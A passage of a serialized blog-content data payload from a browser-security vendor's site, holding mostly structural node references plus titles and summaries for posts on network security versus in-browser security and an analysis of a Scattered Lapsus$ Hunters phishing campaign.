blindspot",{"url":30433,"width":30434,"height":30435},"https://images.ctfassets.net/y1cdw1ablpvd/4zqrAlec1qJaCnE4OUFT7A/7dcd3f568ec90308ba1025ab5be686bb/Screenshot_2026-01-30_at_12.22.19.png",3418,1788,{"sys":30437,"__typename":15269,"type":15270,"ctaText":30438,"buttonLabel":30439,"buttonColour":15273,"buttonUrl":473},{"id":25575},"Stop browser-based attacks in real time. Book a demo today. ","Book a Demo","content:blog:push-plus-endpoint-security.json","blog/push-plus-endpoint-security.json","blog/push-plus-endpoint-security",{"_path":30444,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":30445,"ogImage":118,"summary":30447,"title":6643,"subtitle":118,"metaTitle":30458,"synopsis":26089,"hashTags":118,"publishedDate":25584,"slug":6644,"tagsCollection":30459,"relatedBlogPostsCollection":30465,"authorsCollection":31153,"content":31157,"_id":31608,"_type":5439,"_source":5440,"_file":31609,"_stem":31610,"_extension":5439},"/blog/push-plus-network-security",{"id":2023,"publishedAt":30446},"2026-02-06T16:45:39.763Z",{"json":30448},{"data":30449,"content":30450,"nodeType":165},{},[30451],{"data":30452,"content":30453,"nodeType":178},{},[30454],{"data":30455,"marks":30456,"value":30457,"nodeType":173},{},[],"One key question we get is \"we're already monitoring network and web traffic, so why do we need to be in the browser too?\". Here are the key differences.","Push + Network Security: Seeing packets vs securing sessions",{"items":30460},[30461,30463],{"sys":30462,"name":505},{"id":504},{"sys":30464,"name":509},{"id":508},{"items":30466},[30467,30813],{"__typename":1528,"sys":30468,"content":30469,"title":6647,"synopsis":25583,"hashTags":118,"publishedDate":25584,"slug":6648,"tagsCollection":30803,"authorsCollection":30809},{"id":2044},{"json":30470},{"data":30471,"content":30472,"nodeType":165},{},[30473,30480,30486,30492,30502,30512,30519,30525,30531,30537,30542,30545,30552,30558,30564,30574,30580,30586,30593,30599,30641,30654,30660,30667,30673,30695,30701,30708,30750,30756,30792,30797],{"data":30474,"content":30475,"nodeType":169},{},[30476],{"data":30477,"marks":30478,"value":25212,"nodeType":173},{},[30479],{"type":370},{"data":30481,"content":30482,"nodeType":178},{},[30483],{"data":30484,"marks":30485,"value":25219,"nodeType":173},{},[],{"data":30487,"content":30488,"nodeType":178},{},[30489],{"data":30490,"marks":30491,"value":25226,"nodeType":173},{},[],{"data":30493,"content":30494,"nodeType":178},{},[30495,30498],{"data":30496,"marks":30497,"value":25233,"nodeType":173},{},[],{"data":30499,"marks":30500,"value":25238,"nodeType":173},{},[30501],{"type":370},{"data":30503,"content":30504,"nodeType":178},{},[30505,30508],{"data":30506,"marks":30507,"value":25245,"nodeType":173},{},[],{"data":30509,"marks":30510,"value":25250,"nodeType":173},{},[30511],{"type":1646},{"data":30513,"content":30514,"nodeType":235},{},[30515],{"data":30516,"marks":30517,"value":25258,"nodeType":173},{},[30518],{"type":370},{"data":30520,"content":30521,"nodeType":178},{},[30522],{"data":30523,"marks":30524,"value":25265,"nodeType":173},{},[],{"data":30526,"content":30527,"nodeType":178},{},[30528],{"data":30529,"marks":30530,"value":25272,"nodeType":173},{},[],{"data":30532,"content":30533,"nodeType":178},{},[30534],{"data":30535,"marks":30536,"value":25279,"nodeType":173},{},[],{"data":30538,"content":30541,"nodeType":312},{"target":30539},{"sys":30540},{"id":25284,"type":317,"linkType":318},[],{"data":30543,"content":30544,"nodeType":231},{},[],{"data":30546,"content":30547,"nodeType":169},{},[30548],{"data":30549,"marks":30550,"value":25296,"nodeType":173},{},[30551],{"type":370},{"data":30553,"content":30554,"nodeType":178},{},[30555],{"data":30556,"marks":30557,"value":25303,"nodeType":173},{},[],{"data":30559,"content":30560,"nodeType":178},{},[30561],{"data":30562,"marks":30563,"value":25310,"nodeType":173},{},[],{"data":30565,"content":30566,"nodeType":178},{},[30567,30571],{"data":30568,"marks":30569,"value":25318,"nodeType":173},{},[30570],{"type":370},{"data":30572,"marks":30573,"value":25322,"nodeType":173},{},[],{"data":30575,"content":30576,"nodeType":178},{},[30577],{"data":30578,"marks":30579,"value":25329,"nodeType":173},{},[],{"data":30581,"content":30582,"nodeType":178},{},[30583],{"data":30584,"marks":30585,"value":25336,"nodeType":173},{},[],{"data":30587,"content":30588,"nodeType":235},{},[30589],{"data":30590,"marks":30591,"value":25344,"nodeType":173},{},[30592],{"type":370},{"data":30594,"content":30595,"nodeType":178},{},[30596],{"data":30597,"marks":30598,"value":25351,"nodeType":173},{},[],{"data":30600,"content":30601,"nodeType":250},{},[30602,30615,30628],{"data":30603,"content":30604,"nodeType":254},{},[30605],{"data":30606,"content":30607,"nodeType":178},{},[30608,30612],{"data":30609,"marks":30610,"value":25365,"nodeType":173},{},[30611],{"type":370},{"data":30613,"marks":30614,"value":25369,"nodeType":173},{},[],{"data":30616,"content":30617,"nodeType":254},{},[30618],{"data":30619,"content":30620,"nodeType":178},{},[30621,30625],{"data":30622,"marks":30623,"value":25380,"nodeType":173},{},[30624],{"type":370},{"data":30626,"marks":30627,"value":25384,"nodeType":173},{},[],{"data":30629,"content":30630,"nodeType":254},{},[30631],{"data":30632,"content":30633,"nodeType":178},{},[30634,30638],{"data":30635,"marks":30636,"value":25395,"nodeType":173},{},[30637],{"type":370},{"data":30639,"marks":30640,"value":25399,"nodeType":173},{},[],{"data":30642,"content":30643,"nodeType":178},{},[30644,30647,30651],{"data":30645,"marks":30646,"value":25406,"nodeType":173},{},[],{"data":30648,"marks":30649,"value":25411,"nodeType":173},{},[30650],{"type":370},{"data":30652,"marks":30653,"value":25415,"nodeType":173},{},[],{"data":30655,"content":30656,"nodeType":178},{},[30657],{"data":30658,"marks":30659,"value":25422,"nodeType":173},{},[],{"data":30661,"content":30662,"nodeType":235},{},[30663],{"data":30664,"marks":30665,"value":25430,"nodeType":173},{},[30666],{"type":370},{"data":30668,"content":30669,"nodeType":178},{},[30670],{"data":30671,"marks":30672,"value":25437,"nodeType":173},{},[],{"data":30674,"content":30675,"nodeType":178},{},[30676,30679,30683,30686,30692],{"data":30677,"marks":30678,"value":25444,"nodeType":173},{},[],{"data":30680,"marks":30681,"value":25449,"nodeType":173},{},[30682],{"type":370},{"data":30684,"marks":30685,"value":25453,"nodeType":173},{},[],{"data":30687,"content":30688,"nodeType":186},{"uri":25456},[30689],{"data":30690,"marks":30691,"value":25461,"nodeType":173},{},[],{"data":30693,"marks":30694,"value":37,"nodeType":173},{},[],{"data":30696,"content":30697,"nodeType":178},{},[30698],{"data":30699,"marks":30700,"value":25471,"nodeType":173},{},[],{"data":30702,"content":30703,"nodeType":235},{},[30704],{"data":30705,"marks":30706,"value":25479,"nodeType":173},{},[30707],{"type":370},{"data":30709,"content":30710,"nodeType":250},{},[30711,30724,30737],{"data":30712,"content":30713,"nodeType":254},{},[30714],{"data":30715,"content":30716,"nodeType":178},{},[30717,30721],{"data":30718,"marks":30719,"value":25493,"nodeType":173},{},[30720],{"type":370},{"data":30722,"marks":30723,"value":25497,"nodeType":173},{},[],{"data":30725,"content":30726,"nodeType":254},{},[30727],{"data":30728,"content":30729,"nodeType":178},{},[30730,30734],{"data":30731,"marks":30732,"value":25508,"nodeType":173},{},[30733],{"type":370},{"data":30735,"marks":30736,"value":25512,"nodeType":173},{},[],{"data":30738,"content":30739,"nodeType":254},{},[30740],{"data":30741,"content":30742,"nodeType":178},{},[30743,30747],{"data":30744,"marks":30745,"value":25523,"nodeType":173},{},[30746],{"type":370},{"data":30748,"marks":30749,"value":25527,"nodeType":173},{},[],{"data":30751,"content":30752,"nodeType":178},{},[30753],{"data":30754,"marks":30755,"value":25534,"nodeType":173},{},[],{"data":30757,"content":30758,"nodeType":3769},{},[30759],{"data":30760,"content":30761,"nodeType":178},{},[30762,30765,30771,30774,30780,30783,30789],{"data":30763,"marks":30764,"value":3925,"nodeType":173},{},[],{"data":30766,"content":30767,"nodeType":186},{"uri":1456},[30768],{"data":30769,"marks":30770,"value":3932,"nodeType":173},{},[],{"data":30772,"marks":30773,"value":2936,"nodeType":173},{},[],{"data":30775,"content":30776,"nodeType":186},{"uri":3941},[30777],{"data":30778,"marks":30779,"value":3944,"nodeType":173},{},[],{"data":30781,"marks":30782,"value":3949,"nodeType":173},{},[],{"data":30784,"content":30785,"nodeType":186},{"uri":1469},[30786],{"data":30787,"marks":30788,"value":1472,"nodeType":173},{},[],{"data":30790,"marks":30791,"value":1477,"nodeType":173},{},[],{"data":30793,"content":30796,"nodeType":312},{"target":30794},{"sys":30795},{"id":25575,"type":317,"linkType":318},[],{"data":30798,"content":30799,"nodeType":178},{},[30800],{"data":30801,"marks":30802,"value":37,"nodeType":173},{},[],{"items":30804},[30805,30807],{"sys":30806,"name":505},{"id":504},{"sys":30808,"name":509},{"id":508},{"items":30810},[30811],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":30812},{"url":25597},{"__typename":1528,"sys":30814,"content":30815,"title":6651,"synopsis":28081,"hashTags":118,"publishedDate":28082,"slug":6652,"tagsCollection":31143,"authorsCollection":31149},{"id":2058},{"json":30816},{"nodeType":165,"data":30817,"content":30818},{},[30819,30826,30832,30838,30844,30850,30856,30863,30869,30875,30881,30884,30891,30897,30903,30909,30915,30931,30938,30944,30950,30956,30959,30966,30979,30992,30998,31005,31011,31017,31023,31029,31034,31040,31095,31098,31137],{"nodeType":169,"data":30820,"content":30821},{},[30822],{"nodeType":173,"value":28896,"marks":30823,"data":30825},[30824],{"type":370},{},{"nodeType":178,"data":30827,"content":30828},{},[30829],{"nodeType":173,"value":28904,"marks":30830,"data":30831},[],{},{"nodeType":178,"data":30833,"content":30834},{},[30835],{"nodeType":173,"value":28911,"marks":30836,"data":30837},[],{},{"nodeType":178,"data":30839,"content":30840},{},[30841],{"nodeType":173,"value":28918,"marks":30842,"data":30843},[],{},{"nodeType":178,"data":30845,"content":30846},{},[30847],{"nodeType":173,"value":28925,"marks":30848,"data":30849},[],{},{"nodeType":178,"data":30851,"content":30852},{},[30853],{"nodeType":173,"value":28932,"marks":30854,"data":30855},[],{},{"nodeType":235,"data":30857,"content":30858},{},[30859],{"nodeType":173,"value":28939,"marks":30860,"data":30862},[30861],{"type":370},{},{"nodeType":178,"data":30864,"content":30865},{},[30866],{"nodeType":173,"value":28947,"marks":30867,"data":30868},[],{},{"nodeType":178,"data":30870,"content":30871},{},[30872],{"nodeType":173,"value":28954,"marks":30873,"data":30874},[],{},{"nodeType":178,"data":30876,"content":30877},{},[30878],{"nodeType":173,"value":28961,"marks":30879,"data":30880},[],{},{"nodeType":231,"data":30882,"content":30883},{},[],{"nodeType":169,"data":30885,"content":30886},{},[30887],{"nodeType":173,"value":28971,"marks":30888,"data":30890},[30889],{"type":370},{},{"nodeType":178,"data":30892,"content":30893},{},[30894],{"nodeType":173,"value":28979,"marks":30895,"data":30896},[],{},{"nodeType":178,"data":30898,"content":30899},{},[30900],{"nodeType":173,"value":28986,"marks":30901,"data":30902},[],{},{"nodeType":178,"data":30904,"content":30905},{},[30906],{"nodeType":173,"value":28993,"marks":30907,"data":30908},[],{},{"nodeType":178,"data":30910,"content":30911},{},[30912],{"nodeType":173,"value":29000,"marks":30913,"data":30914},[],{},{"nodeType":178,"data":30916,"content":30917},{},[30918,30921,30928],{"nodeType":173,"value":25743,"marks":30919,"data":30920},[],{},{"nodeType":186,"data":30922,"content":30923},{"uri":5002},[30924],{"nodeType":173,"value":29013,"marks":30925,"data":30927},[30926],{"type":194},{},{"nodeType":173,"value":29018,"marks":30929,"data":30930},[],{},{"nodeType":235,"data":30932,"content":30933},{},[30934],{"nodeType":173,"value":29025,"marks":30935,"data":30937},[30936],{"type":370},{},{"nodeType":178,"data":30939,"content":30940},{},[30941],{"nodeType":173,"value":29033,"marks":30942,"data":30943},[],{},{"nodeType":178,"data":30945,"content":30946},{},[30947],{"nodeType":173,"value":29040,"marks":30948,"data":30949},[],{},{"nodeType":178,"data":30951,"content":30952},{},[30953],{"nodeType":173,"value":29047,"marks":30954,"data":30955},[],{},{"nodeType":231,"data":30957,"content":30958},{},[],{"nodeType":169,"data":30960,"content":30961},{},[30962],{"nodeType":173,"value":29057,"marks":30963,"data":30965},[30964],{"type":370},{},{"nodeType":178,"data":30967,"content":30968},{},[30969,30972,30976],{"nodeType":173,"value":29065,"marks":30970,"data":30971},[],{},{"nodeType":173,"value":29069,"marks":30973,"data":30975},[30974],{"type":370},{},{"nodeType":173,"value":29074,"marks":30977,"data":30978},[],{},{"nodeType":178,"data":30980,"content":30981},{},[30982,30985,30989],{"nodeType":173,"value":29081,"marks":30983,"data":30984},[],{},{"nodeType":173,"value":29085,"marks":30986,"data":30988},[30987],{"type":370},{},{"nodeType":173,"value":29090,"marks":30990,"data":30991},[],{},{"nodeType":178,"data":30993,"content":30994},{},[30995],{"nodeType":173,"value":29097,"marks":30996,"data":30997},[],{},{"nodeType":235,"data":30999,"content":31000},{},[31001],{"nodeType":173,"value":29104,"marks":31002,"data":31004},[31003],{"type":370},{},{"nodeType":178,"data":31006,"content":31007},{},[31008],{"nodeType":173,"value":29112,"marks":31009,"data":31010},[],{},{"nodeType":178,"data":31012,"content":31013},{},[31014],{"nodeType":173,"value":29119,"marks":31015,"data":31016},[],{},{"nodeType":178,"data":31018,"content":31019},{},[31020],{"nodeType":173,"value":29126,"marks":31021,"data":31022},[],{},{"nodeType":178,"data":31024,"content":31025},{},[31026],{"nodeType":173,"value":29133,"marks":31027,"data":31028},[],{},{"nodeType":312,"data":31030,"content":31033},{"target":31031},{"sys":31032},{"id":25922,"type":317,"linkType":318},[],{"nodeType":178,"data":31035,"content":31036},{},[31037],{"nodeType":173,"value":29145,"marks":31038,"data":31039},[],{},{"nodeType":250,"data":31041,"content":31042},{},[31043,31056,31069,31082],{"nodeType":254,"data":31044,"content":31045},{},[31046],{"nodeType":178,"data":31047,"content":31048},{},[31049,31053],{"nodeType":173,"value":29158,"marks":31050,"data":31052},[31051],{"type":370},{},{"nodeType":173,"value":29163,"marks":31054,"data":31055},[],{},{"nodeType":254,"data":31057,"content":31058},{},[31059],{"nodeType":178,"data":31060,"content":31061},{},[31062,31066],{"nodeType":173,"value":29173,"marks":31063,"data":31065},[31064],{"type":370},{},{"nodeType":173,"value":29178,"marks":31067,"data":31068},[],{},{"nodeType":254,"data":31070,"content":31071},{},[31072],{"nodeType":178,"data":31073,"content":31074},{},[31075,31079],{"nodeType":173,"value":29188,"marks":31076,"data":31078},[31077],{"type":370},{},{"nodeType":173,"value":29193,"marks":31080,"data":31081},[],{},{"nodeType":254,"data":31083,"content":31084},{},[31085],{"nodeType":178,"data":31086,"content":31087},{},[31088,31092],{"nodeType":173,"value":29203,"marks":31089,"data":31091},[31090],{"type":370},{},{"nodeType":173,"value":29208,"marks":31093,"data":31094},[],{},{"nodeType":231,"data":31096,"content":31097},{},[],{"nodeType":3769,"data":31099,"content":31100},{},[31101],{"nodeType":178,"data":31102,"content":31103},{},[31104,31107,31114,31117,31124,31127,31134],{"nodeType":173,"value":3925,"marks":31105,"data":31106},[],{},{"nodeType":186,"data":31108,"content":31109},{"uri":1456},[31110],{"nodeType":173,"value":3932,"marks":31111,"data":31113},[31112],{"type":194},{},{"nodeType":173,"value":2936,"marks":31115,"data":31116},[],{},{"nodeType":186,"data":31118,"content":31119},{"uri":3941},[31120],{"nodeType":173,"value":3944,"marks":31121,"data":31123},[31122],{"type":194},{},{"nodeType":173,"value":3949,"marks":31125,"data":31126},[],{},{"nodeType":186,"data":31128,"content":31129},{"uri":1469},[31130],{"nodeType":173,"value":1472,"marks":31131,"data":31133},[31132],{"type":194},{},{"nodeType":173,"value":1477,"marks":31135,"data":31136},[],{},{"nodeType":178,"data":31138,"content":31139},{},[31140],{"nodeType":173,"value":37,"marks":31141,"data":31142},[],{},{"items":31144},[31145,31147],{"sys":31146,"name":505},{"id":504},{"sys":31148,"name":509},{"id":508},{"items":31150},[31151],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":31152},{"url":25597},{"items":31154},[31155],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":31156},{"url":25597},{"json":31158,"links":31592},{"data":31159,"content":31160,"nodeType":165},{},[31161,31168,31174,31180,31190,31197,31203,31209,31215,31222,31225,31232,31238,31244,31250,31265,31270,31276,31291,31298,31406,31409,31416,31422,31432,31438,31443,31449,31455,31462,31468,31475,31481,31487,31493,31535,31545,31581,31586],{"data":31162,"content":31163,"nodeType":169},{},[31164],{"data":31165,"marks":31166,"value":25611,"nodeType":173},{},[31167],{"type":370},{"data":31169,"content":31170,"nodeType":178},{},[31171],{"data":31172,"marks":31173,"value":25618,"nodeType":173},{},[],{"data":31175,"content":31176,"nodeType":178},{},[31177],{"data":31178,"marks":31179,"value":25625,"nodeType":173},{},[],{"data":31181,"content":31182,"nodeType":178},{},[31183,31186],{"data":31184,"marks":31185,"value":25632,"nodeType":173},{},[],{"data":31187,"marks":31188,"value":25637,"nodeType":173},{},[31189],{"type":370},{"data":31191,"content":31192,"nodeType":235},{},[31193],{"data":31194,"marks":31195,"value":25645,"nodeType":173},{},[31196],{"type":370},{"data":31198,"content":31199,"nodeType":178},{},[31200],{"data":31201,"marks":31202,"value":25652,"nodeType":173},{},[],{"data":31204,"content":31205,"nodeType":178},{},[31206],{"data":31207,"marks":31208,"value":25659,"nodeType":173},{},[],{"data":31210,"content":31211,"nodeType":178},{},[31212],{"data":31213,"marks":31214,"value":25666,"nodeType":173},{},[],{"data":31216,"content":31217,"nodeType":178},{},[31218],{"data":31219,"marks":31220,"value":25674,"nodeType":173},{},[31221],{"type":370},{"data":31223,"content":31224,"nodeType":231},{},[],{"data":31226,"content":31227,"nodeType":169},{},[31228],{"data":31229,"marks":31230,"value":25685,"nodeType":173},{},[31231],{"type":370},{"data":31233,"content":31234,"nodeType":178},{},[31235],{"data":31236,"marks":31237,"value":25692,"nodeType":173},{},[],{"data":31239,"content":31240,"nodeType":178},{},[31241],{"data":31242,"marks":31243,"value":25699,"nodeType":173},{},[],{"data":31245,"content":31246,"nodeType":178},{},[31247],{"data":31248,"marks":31249,"value":25706,"nodeType":173},{},[],{"data":31251,"content":31252,"nodeType":178},{},[31253,31256,31262],{"data":31254,"marks":31255,"value":25713,"nodeType":173},{},[],{"data":31257,"content":31258,"nodeType":186},{"uri":8987},[31259],{"data":31260,"marks":31261,"value":8157,"nodeType":173},{},[],{"data":31263,"marks":31264,"value":25723,"nodeType":173},{},[],{"data":31266,"content":31269,"nodeType":312},{"target":31267},{"sys":31268},{"id":25728,"type":317,"linkType":318},[],{"data":31271,"content":31272,"nodeType":178},{},[31273],{"data":31274,"marks":31275,"value":25736,"nodeType":173},{},[],{"data":31277,"content":31278,"nodeType":178},{},[31279,31282,31288],{"data":31280,"marks":31281,"value":25743,"nodeType":173},{},[],{"data":31283,"content":31284,"nodeType":186},{"uri":5002},[31285],{"data":31286,"marks":31287,"value":25750,"nodeType":173},{},[],{"data":31289,"marks":31290,"value":25754,"nodeType":173},{},[],{"data":31292,"content":31293,"nodeType":178},{},[31294],{"data":31295,"marks":31296,"value":25762,"nodeType":173},{},[31297],{"type":1646},{"data":31299,"content":31300,"nodeType":1653},{},[31301,31322,31343,31364,31385],{"data":31302,"content":31303,"nodeType":1657},{},[31304,31313],{"data":31305,"content":31306,"nodeType":1661},{},[31307],{"data":31308,"content":31309,"nodeType":178},{},[31310],{"data":31311,"marks":31312,"value":25778,"nodeType":173},{},[],{"data":31314,"content":31315,"nodeType":1661},{},[31316],{"data":31317,"content":31318,"nodeType":178},{},[31319],{"data":31320,"marks":31321,"value":25788,"nodeType":173},{},[],{"data":31323,"content":31324,"nodeType":1657},{},[31325,31334],{"data":31326,"content":31327,"nodeType":1687},{},[31328],{"data":31329,"content":31330,"nodeType":178},{},[31331],{"data":31332,"marks":31333,"value":25801,"nodeType":173},{},[],{"data":31335,"content":31336,"nodeType":1687},{},[31337],{"data":31338,"content":31339,"nodeType":178},{},[31340],{"data":31341,"marks":31342,"value":25811,"nodeType":173},{},[],{"data":31344,"content":31345,"nodeType":1657},{},[31346,31355],{"data":31347,"content":31348,"nodeType":1687},{},[31349],{"data":31350,"content":31351,"nodeType":178},{},[31352],{"data":31353,"marks":31354,"value":25824,"nodeType":173},{},[],{"data":31356,"content":31357,"nodeType":1687},{},[31358],{"data":31359,"content":31360,"nodeType":178},{},[31361],{"data":31362,"marks":31363,"value":25834,"nodeType":173},{},[],{"data":31365,"content":31366,"nodeType":1657},{},[31367,31376],{"data":31368,"content":31369,"nodeType":1687},{},[31370],{"data":31371,"content":31372,"nodeType":178},{},[31373],{"data":31374,"marks":31375,"value":25847,"nodeType":173},{},[],{"data":31377,"content":31378,"nodeType":1687},{},[31379],{"data":31380,"content":31381,"nodeType":178},{},[31382],{"data":31383,"marks":31384,"value":25857,"nodeType":173},{},[],{"data":31386,"content":31387,"nodeType":1657},{},[31388,31397],{"data":31389,"content":31390,"nodeType":1687},{},[31391],{"data":31392,"content":31393,"nodeType":178},{},[31394],{"data":31395,"marks":31396,"value":25870,"nodeType":173},{},[],{"data":31398,"content":31399,"nodeType":1687},{},[31400],{"data":31401,"content":31402,"nodeType":178},{},[31403],{"data":31404,"marks":31405,"value":25880,"nodeType":173},{},[],{"data":31407,"content":31408,"nodeType":231},{},[],{"data":31410,"content":31411,"nodeType":169},{},[31412],{"data":31413,"marks":31414,"value":25891,"nodeType":173},{},[31415],{"type":370},{"data":31417,"content":31418,"nodeType":178},{},[31419],{"data":31420,"marks":31421,"value":25898,"nodeType":173},{},[],{"data":31423,"content":31424,"nodeType":178},{},[31425,31428],{"data":31426,"marks":31427,"value":25905,"nodeType":173},{},[],{"data":31429,"marks":31430,"value":25910,"nodeType":173},{},[31431],{"type":370},{"data":31433,"content":31434,"nodeType":178},{},[31435],{"data":31436,"marks":31437,"value":25917,"nodeType":173},{},[],{"data":31439,"content":31442,"nodeType":312},{"target":31440},{"sys":31441},{"id":25922,"type":317,"linkType":318},[],{"data":31444,"content":31445,"nodeType":178},{},[31446],{"data":31447,"marks":31448,"value":25930,"nodeType":173},{},[],{"data":31450,"content":31451,"nodeType":178},{},[31452],{"data":31453,"marks":31454,"value":25937,"nodeType":173},{},[],{"data":31456,"content":31457,"nodeType":235},{},[31458],{"data":31459,"marks":31460,"value":25945,"nodeType":173},{},[31461],{"type":370},{"data":31463,"content":31464,"nodeType":178},{},[31465],{"data":31466,"marks":31467,"value":25952,"nodeType":173},{},[],{"data":31469,"content":31470,"nodeType":178},{},[31471],{"data":31472,"marks":31473,"value":25960,"nodeType":173},{},[31474],{"type":370},{"data":31476,"content":31477,"nodeType":178},{},[31478],{"data":31479,"marks":31480,"value":25967,"nodeType":173},{},[],{"data":31482,"content":31483,"nodeType":178},{},[31484],{"data":31485,"marks":31486,"value":25974,"nodeType":173},{},[],{"data":31488,"content":31489,"nodeType":178},{},[31490],{"data":31491,"marks":31492,"value":25981,"nodeType":173},{},[],{"data":31494,"content":31495,"nodeType":250},{},[31496,31509,31522],{"data":31497,"content":31498,"nodeType":254},{},[31499],{"data":31500,"content":31501,"nodeType":178},{},[31502,31506],{"data":31503,"marks":31504,"value":25995,"nodeType":173},{},[31505],{"type":370},{"data":31507,"marks":31508,"value":25999,"nodeType":173},{},[],{"data":31510,"content":31511,"nodeType":254},{},[31512],{"data":31513,"content":31514,"nodeType":178},{},[31515,31519],{"data":31516,"marks":31517,"value":26010,"nodeType":173},{},[31518],{"type":370},{"data":31520,"marks":31521,"value":26014,"nodeType":173},{},[],{"data":31523,"content":31524,"nodeType":254},{},[31525],{"data":31526,"content":31527,"nodeType":178},{},[31528,31532],{"data":31529,"marks":31530,"value":26025,"nodeType":173},{},[31531],{"type":370},{"data":31533,"marks":31534,"value":26029,"nodeType":173},{},[],{"data":31536,"content":31537,"nodeType":178},{},[31538,31541],{"data":31539,"marks":31540,"value":26036,"nodeType":173},{},[],{"data":31542,"marks":31543,"value":26041,"nodeType":173},{},[31544],{"type":370},{"data":31546,"content":31547,"nodeType":3769},{},[31548],{"data":31549,"content":31550,"nodeType":178},{},[31551,31554,31560,31563,31569,31572,31578],{"data":31552,"marks":31553,"value":3925,"nodeType":173},{},[],{"data":31555,"content":31556,"nodeType":186},{"uri":1456},[31557],{"data":31558,"marks":31559,"value":3932,"nodeType":173},{},[],{"data":31561,"marks":31562,"value":2936,"nodeType":173},{},[],{"data":31564,"content":31565,"nodeType":186},{"uri":3941},[31566],{"data":31567,"marks":31568,"value":3944,"nodeType":173},{},[],{"data":31570,"marks":31571,"value":3949,"nodeType":173},{},[],{"data":31573,"content":31574,"nodeType":186},{"uri":1469},[31575],{"data":31576,"marks":31577,"value":1472,"nodeType":173},{},[],{"data":31579,"marks":31580,"value":1477,"nodeType":173},{},[],{"data":31582,"content":31585,"nodeType":312},{"target":31583},{"sys":31584},{"id":25575,"type":317,"linkType":318},[],{"data":31587,"content":31588,"nodeType":178},{},[31589],{"data":31590,"marks":31591,"value":37,"nodeType":173},{},[],{"entries":31593},{"hyperlink":31594,"inline":31595,"block":31596},[],[],[31597,31603,31606],{"sys":31598,"__typename":5345,"title":31599,"caption":118,"layoutMode":118,"file":31600},{"id":25728},"Why known-bad detections are failing. ",{"url":31601,"width":29269,"height":31602},"https://images.ctfassets.net/y1cdw1ablpvd/6b63OwWsBBv4z7HAiaOKL8/defc65b40e27f1b14ad64cbf09d8c1d4/Screenshot_2026-01-30_at_16.57.54.png",1800,{"sys":31604,"__typename":5345,"title":29266,"caption":29266,"layoutMode":118,"file":31605},{"id":25922},{"url":29268,"width":29269,"height":29270},{"sys":31607,"__typename":15269,"type":15270,"ctaText":30438,"buttonLabel":30439,"buttonColour":15273,"buttonUrl":473},{"id":25575},"content:blog:push-plus-network-security.json","blog/push-plus-network-security.json","blog/push-plus-network-security",{"_path":31612,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":31613,"ogImage":118,"summary":31615,"title":9225,"subtitle":118,"metaTitle":31626,"synopsis":9226,"hashTags":118,"publishedDate":9227,"slug":9228,"tagsCollection":31627,"authorsCollection":31633,"content":31637,"relatedBlogPostsCollection":32284,"_id":34961,"_type":5439,"_source":5440,"_file":34962,"_stem":34963,"_extension":5439},"/blog/unpacking-the-latest-slh-campaign",{"id":8618,"publishedAt":31614},"2026-02-05T14:20:50.440Z",{"json":31616},{"data":31617,"content":31618,"nodeType":165},{},[31619],{"data":31620,"content":31621,"nodeType":178},{},[31622],{"data":31623,"marks":31624,"value":31625,"nodeType":173},{},[],"Analysing the latest Scattered Lapsus$ Hunters (SLH) phishing campaign targeting hundreds of organizations. ","Unpacking the latest SLH phishing campaign",{"items":31628},[31629,31631],{"sys":31630,"name":505},{"id":504},{"sys":31632,"name":509},{"id":508},{"items":31634},[31635],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":31636},{"url":1496},{"json":31638,"links":32160},{"nodeType":165,"data":31639,"content":31640},{},[31641,31657,31663,31669,31672,31679,31695,31711,31738,31743,31746,31753,31760,31766,31782,31788,31793,31798,31804,31810,31817,31823,31829,31834,31840,31856,31863,31869,31875,31891,31896,31912,31917,31923,31928,31931,31938,31944,31960,31966,31989,31995,32002,32005,32012,32018,32024,32029,32035,32074,32079,32085,32111,32116,32154],{"nodeType":178,"data":31642,"content":31643},{},[31644,31647,31654],{"nodeType":173,"value":37,"marks":31645,"data":31646},[],{},{"nodeType":186,"data":31648,"content":31649},{"uri":5002},[31650],{"nodeType":173,"value":6811,"marks":31651,"data":31653},[31652],{"type":194},{},{"nodeType":173,"value":8637,"marks":31655,"data":31656},[],{},{"nodeType":178,"data":31658,"content":31659},{},[31660],{"nodeType":173,"value":8644,"marks":31661,"data":31662},[],{},{"nodeType":178,"data":31664,"content":31665},{},[31666],{"nodeType":173,"value":8651,"marks":31667,"data":31668},[],{},{"nodeType":231,"data":31670,"content":31671},{},[],{"nodeType":169,"data":31673,"content":31674},{},[31675],{"nodeType":173,"value":8661,"marks":31676,"data":31678},[31677],{"type":370},{},{"nodeType":178,"data":31680,"content":31681},{},[31682,31685,31692],{"nodeType":173,"value":8669,"marks":31683,"data":31684},[],{},{"nodeType":186,"data":31686,"content":31687},{"uri":8674},[31688],{"nodeType":173,"value":8677,"marks":31689,"data":31691},[31690],{"type":194},{},{"nodeType":173,"value":8682,"marks":31693,"data":31694},[],{},{"nodeType":178,"data":31696,"content":31697},{},[31698,31701,31708],{"nodeType":173,"value":8689,"marks":31699,"data":31700},[],{},{"nodeType":186,"data":31702,"content":31703},{"uri":926},[31704],{"nodeType":173,"value":8696,"marks":31705,"data":31707},[31706],{"type":194},{},{"nodeType":173,"value":8701,"marks":31709,"data":31710},[],{},{"nodeType":178,"data":31712,"content":31713},{},[31714,31717,31721,31724,31728,31731,31735],{"nodeType":173,"value":8708,"marks":31715,"data":31716},[],{},{"nodeType":173,"value":8712,"marks":31718,"data":31720},[31719],{"type":370},{},{"nodeType":173,"value":8717,"marks":31722,"data":31723},[],{},{"nodeType":173,"value":8721,"marks":31725,"data":31727},[31726],{"type":370},{},{"nodeType":173,"value":8726,"marks":31729,"data":31730},[],{},{"nodeType":173,"value":8730,"marks":31732,"data":31734},[31733],{"type":370},{},{"nodeType":173,"value":8735,"marks":31736,"data":31737},[],{},{"nodeType":312,"data":31739,"content":31742},{"target":31740},{"sys":31741},{"id":8742,"type":317,"linkType":318},[],{"nodeType":231,"data":31744,"content":31745},{},[],{"nodeType":169,"data":31747,"content":31748},{},[31749],{"nodeType":173,"value":8751,"marks":31750,"data":31752},[31751],{"type":370},{},{"nodeType":235,"data":31754,"content":31755},{},[31756],{"nodeType":173,"value":8759,"marks":31757,"data":31759},[31758],{"type":370},{},{"nodeType":178,"data":31761,"content":31762},{},[31763],{"nodeType":173,"value":8767,"marks":31764,"data":31765},[],{},{"nodeType":178,"data":31767,"content":31768},{},[